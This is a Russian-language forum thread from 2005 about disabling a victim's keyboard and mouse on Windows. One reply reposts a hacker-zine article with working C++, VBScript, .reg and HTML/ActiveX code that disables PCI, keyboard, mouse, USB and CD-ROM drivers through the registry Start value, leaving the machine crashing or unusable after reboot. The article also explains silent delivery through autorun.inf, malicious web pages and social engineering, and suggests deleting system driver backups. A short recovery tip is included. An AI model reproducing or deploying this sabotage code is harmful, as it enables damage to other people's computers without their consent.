Отключение клавиатуры и мыши
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Отключение клавиатуры и мыши - 2005-07-27 12:22:28
|
|
|
ApX@HrE//
Сообщений: 7
Оценки: 0
Присоединился: 2005-07-27 12:08:24
|
Достаточно давно (не помню где) читал, что в реестре есть ключи, с помошью которых можно "отключить" клаву и мышку.
Иными словами, после перезагрузки Винда не будет реагировать на нажатие кнопок.
Спасти может только формат и перестановки Винды.
Это правда или прикол?
Если правда, как провернуть такую операцию
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-07-27 19:17:27
|
|
|
kerber0$
Сообщений: 12
Оценки: 0
Присоединился: 2005-07-21 21:30:16
|
Не берусь утверждать насчет ключей- не заявляю и не предполагаю то, чего не знаю точно. Но насчет полного формата, и переустановки оси- полнейший бред[sm=mad.gif]. Загрузочные диски со всякими там ERD командерами и т.п., дискеты и командную строку (ведь реестр и из нее можно редактировать) [sm=go139.gif]еще никто, насколько мне известно, не отменял.
Да и вообще - все зависит от оси. Если это 9xи т.п. то работает старая-добрая команда rundll32 keyboard,disable и
rundll32 mouse,disable Таким образом- стряпаем батник, пишем его в автозагрузку и все работает.[sm=1.gif]
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-07-27 19:53:53
|
|
|
ApX@HrE//
Сообщений: 7
Оценки: 0
Присоединился: 2005-07-27 12:08:24
|
Про 9х винду я знаю от сюда
Мне бы надо чтоб работало на ХР
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-07-27 23:40:03
|
|
|
ESL
Сообщений: 493
Оценки: 0
Присоединился: 2005-04-25 00:40:17
|
В каком-то из хелпов на whatis.ru видел как, вроде через rundll32 можно отрубать клаву и под XP
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-02 12:35:10
|
|
|
ApX@HrE//
Сообщений: 7
Оценки: 0
Присоединился: 2005-07-27 12:08:24
|
Есть инфа!!!
quote:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mouclass<BR>Параметр Start<BR>В каждом из ключей, содержащихся под ключом реестра HKEY_LOCAL_ MACHINE\SYSTEM\<control set>\Services\DriverName присутствует параметр start, определяющий порядок запуска драйвера или сервиса. Он может иметь описанные ниже значения………<BR>
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-02 12:37:26
|
|
|
ApX@HrE//
Сообщений: 7
Оценки: 0
Присоединился: 2005-07-27 12:08:24
|
quote:
0x0 (Boot, Загрузка). Загрузка драйвера или сервиса осуществляется загрузчиком операционной системы перед инициализацией ядра. В качестве примера драйверов с таким режимом загрузки можно привести драйверы дисков. <BR>0x1 (System, Система). Загрузка осуществляется подсистемой ввода/вывода во время инициализации ядра. В качестве примера драйверов, использующих этот тип значения, можно назвать драйверы мыши. <BR>0x2 (Auto load, Автомат). Загружается Диспетчером управления сервисами (Service Control Manager). Таким образом загружаются сервисы, которые должны стартовать автоматически при любых обстоятельствах запуска системы, вне зависимости от типа сервиса. В качестве примера можно привести драйверы устройств, работающих через параллельный порт. Одним из сервисов, использующих это значение, является сервис а1егter. <BR>0x3 (Load on Demand, Manual, Вручную). Загружается Диспетчером управления сервисами (Service Control Manager) только в случае получения явной инструкции на загрузку. Сервисы этого типа доступны всегда, но загружаются, только когда пользователь запускает их (например, используя опцию Службы (Services) оснастки Управление компьютером (Computer Management)). <BR>0x4 (Disabled, Запрет). Не загружается. windоws 2000/XP устанавливает в этот режим драйверы устройств в случае невозможности их загрузки диспетчером сервисов (например, если не установлены соответствующие аппаратные средства). Если параметр имеет указанное значение, диспетчер сервисов не загружает соответствующий драйвер или сервис. Единственным исключением являются драйверы файловых систем, которые загружаются, даже если для, них установлено данное значение в параметре Start.
Помогите сделать ЕХЕ файл.[sm=em62.gif] (Задача - чтобы отключилась только МЫШЬ)
Сам не смогу (не знаю как)[sm=15.gif]
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-02 20:48:22
|
|
|
kerber0$
Сообщений: 12
Оценки: 0
Присоединился: 2005-07-21 21:30:16
|
прикольно!
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-02 20:49:23
|
|
|
kerber0$
Сообщений: 12
Оценки: 0
Присоединился: 2005-07-21 21:30:16
|
ApX@HrE//, уж не себе ли ты хочешь экзешником мышь отрубать! Хех![sm=2.gif] А почему именно екзешник? Можно и с vbs неплохо справиться….[sm=sm128.gif] Ну чтож спасибо за инфу. Это познавательно.
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-04 16:51:36
|
|
|
ximera
Сообщений: 39
Оценки: 0
Присоединился: 2005-01-10 23:16:36
|
Взято из defaced_04
windоws CE + windоws ME + windоws NT == windоws CEMENT
–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==–==
Западло в windоws XP. Сервисы
Автор: Dumplex <dumplex@mail.ru>
Intro
Наверное, ни для кого не секрет, что список сервисов можно получить по адресу
HKLM\SYSTEM\CurrentControlSet\Services. Среди имеющихся по дефолту сервисов я
выделил 7:
..\AudioSrv
..\KbdClass
..\MouClass
..\FlpyDisk
..\Usbohci
..\Cdrom
..\PCI
Все эти сервисы по совместительству являются еще и драйверами (см.
%systemroot%\system32\drivers). Чуешь, чем пахнет? Вот именно - при отключении,
скажем сервиса мыши, крыса либо не будет дрыгаться, либо совсем исчезнет
(курсора не будет видно). Особенно хотелось бы отметить последний - при его
отключении телега не загрузится :) Но есть одно НО. Отключение происходит ТОЛЬКО
после того, как пробежит белая полоса загрузки (перед появлением эмблемы
Microsoft, или что там у тебя стоит). Все параметры запуска сервиса находятся в
DWORD-параметре Start. Вот они:
2 - автозагрузка
3 - ручная загрузка
4 - отключено (примечание. Можно просто удалить Start)
Ниже приведены исходники программ, выполняющих одну и туже функцию, на разных
языках.
Microsoft Visual Studio
Все фишки с сокращением размера я сдирал с www.uinc.ru и www.sources.ru. Создаем
пустое Win32 приложение без поддержки MFC и ATL. Active Solution Configuration
ставим в Release. Дальше идем в Linker => Input, прописываем единственную
библиотеку msvcrt.lib. А вот собственно и исходник:
Main.cpp:
#include <windоws.h>
#include "compress.h"
void New_WinMain(void)
{
HKEY hk;
RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\PCI",&hk);
RegDeleteValue(hk,"Start");
RegCloseKey(hk);
}
compress.h:
#ifdef NDEBUG
#pragma optimize("gsy",on)
#pragma comment(linker,"/MERGE:.rdata=.text")
#pragma comment(linker,"/ENTRY:New_WinMain")
#pragma comment(linker,"/NODEFAULTLIB")
#pragma comment(linker,"/merge:.rdata=.data")
#pragma comment(linker,"/merge:.text=.data")
#if _MSC_VER >= 1000
#endif
#endif
При запуске данной программы (она весит 1 килограмм) отключается PCI, поэтому
после первой же перезагрузки появится синий экран и козяблики :) Чтобы отключить
что-то другое - надо просто заменить PCI скажем на KbdClass (примечание: при
отключении, скажем, той же клавы лучше отключать еще и ubohci, т.к. велика
вероятность того, что у юзера USB клава/крыса)
Visual Basic Sсгiрts
ИМХО vbs - идеальное средство для западлоcтроения. Он есть практически у всех
юзверей и для написания скриптов не требуется ни каких инструментов (за
исключением Блокнота). Значит в блокноте (или подобном текстовом редакторе)
создаем новый документ и сохраняем с расширением *.vbs. Вот код:
On Error Resume Next
Dim Fuck
Set Fuck = WSсгiрt.CreateоЬjесt("WSсгiрt.Shell")
Fuck.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PCI\Start", "Fucked"
Основным недостатком является то, что юзверь может просмотреть содержимое файла.
Радует, пожалуй, только один факт - не всем это надо и не все знают, что сей
сырц делает.
Regedit
Это конечно не язык программирования, но на нем удобно писать некое подобие
скриптов для автоматизации работы с реестром. Основным плюсом является
присутствие данной программы (regedit) у каждого рядового юзверя windоws. В
блокноте создать новый документ и написать вот этот текст:
REGEDIT 4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\flpydisk]
"Start"=DWORD:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cdrom]
"Start"=DWORD:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass]
"Start"=DWORD:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdclass]
"Start"=DWORD:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\audiosrv]
"Start"=DWORD:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbohci]
"Start"=DWORD:00000004
и сохранить с расширением *.reg. Но, при запуске у юзверя спрашивают, хочет он
загрузить эту хрень или нет. Он, конечно, нажмет, нет :) Чтобы этого не
произошло, предусмотрительные программеры Microsoft'а придумали такую вот штуку
- при использовании синтаксиса regedit /s <file_name> никаких вопросов задано не
будет.
Впаривание
Теперь поговорим немного о том, как это дело впарить. Можно положить программу в
корень винта (чужого) и туда же кинуть файл autorun.inf следующего содержания:
[AUTORUN]
Open=Suck_My_Dick.exe
Естественно, ни о чем не подозревающая жертва тыкает на диск два раза, а дальше
сам знаешь чего :) HTML с применением скриптов тоже действенное средство:
<BODY onLoad="HackXP()">
<Sсгiрt language=JavaSсгiрt>
var WShell = new ActiveXоЬjесt( "WSсгiрt.Shell" );
function HackXP(){
WShell.RegWrite("HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\PCI\\Start", "Fucked");}
</Sсгiрt>
</BODY>
Но, имхо, соц. инженерия - получше будет. Небольшая обработка жертвы - и она
сама удаляет Start))
Защита
В связи с выше прочитанным, по крайней мере, у меня, возникает вопрос: А как
уберечься от подобных пакостей??? Можно засунуть файл типа этого в автозагрузку:
REGEDIT 4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\flpydisk]
"Start"=DWORD:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cdrom]
"Start"=DWORD:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass]
"Start"=DWORD:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdclass]
"Start"=DWORD:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\audiosrv]
"Start"=DWORD:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbohci]
"Start"=DWORD:00000002
но если необходимо вводить пароль (попробуй его ввести без клавиатуры :) или
выскакивает сообщение, ничего не выйдет… Но не все так плохо. Значит перед
загрузкой системы зажми F8 и держи до появления меню. В меню выбери "Загрузка
последней удачной конфигурации (с работоспособными параметрами)" и все дела
(примечание: На некоторых машинах сбивались все настройки, так что будь
осторожнее). Программа тестировалась на WinXP Prof. (SP1) и Home (SP1), хотя, по
идее, должна работать на всех NT-like системах. Для работы нужны права админа.
ЗЫ. Вандалы могут удалить все файлы из %systemroot%\system32\dllcache (копии
системных файлов) а затем %systemroot%\system32\drivers (сами дрова). По идее
"Последняя удачная" уже не должна помогать, но я не проверял - не знаю…
P.S. Сам не пробовал, не знаю
|
|
|
|
|
Отключение клавиатуры и мыши - 2005-08-18 12:37:12
|
|
|
C1anNFeaR
Сообщений: 639
Оценки: 0
Присоединился: 2005-04-22 13:18:18
|
А где можно Defaced скачать?
|
|
|
|
|
|
